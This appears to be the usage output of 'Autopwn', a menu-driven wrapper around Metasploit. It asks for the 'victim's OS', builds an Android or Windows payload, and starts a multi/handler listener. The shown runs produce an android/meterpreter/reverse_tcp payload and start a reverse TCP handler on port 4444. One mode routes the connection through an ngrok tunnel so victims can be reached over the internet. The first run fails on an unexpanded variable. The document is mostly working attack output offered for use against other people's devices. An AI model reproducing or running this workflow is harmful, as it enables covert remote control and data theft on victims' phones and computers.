Autopwn
Autopwn copied to clipboard
The value specified for PAYLOAD is not valid (LHOST => $ipad)
Now choose your victim`s OS
Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10233 bytes
payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => $ipad
LPORT => 4444
[-] The value specified for PAYLOAD is not valid.
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
And with over internet:
Press 1 for WAN (over the internet)
Press 2 for LAN (On the same network)
1
start ngrok on your device, by opening
a new window in the terminal
and type "ngrok tcp 4444" then,
note down the port number after tcp://0.ngrok.tcp.io:"<port>"
and paste it below
12348
name of the desired file
autopwninternet
Now choose your victim`s OS
Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10239 bytes
payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
PAYLOAD => android/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 0.0.0.0:4444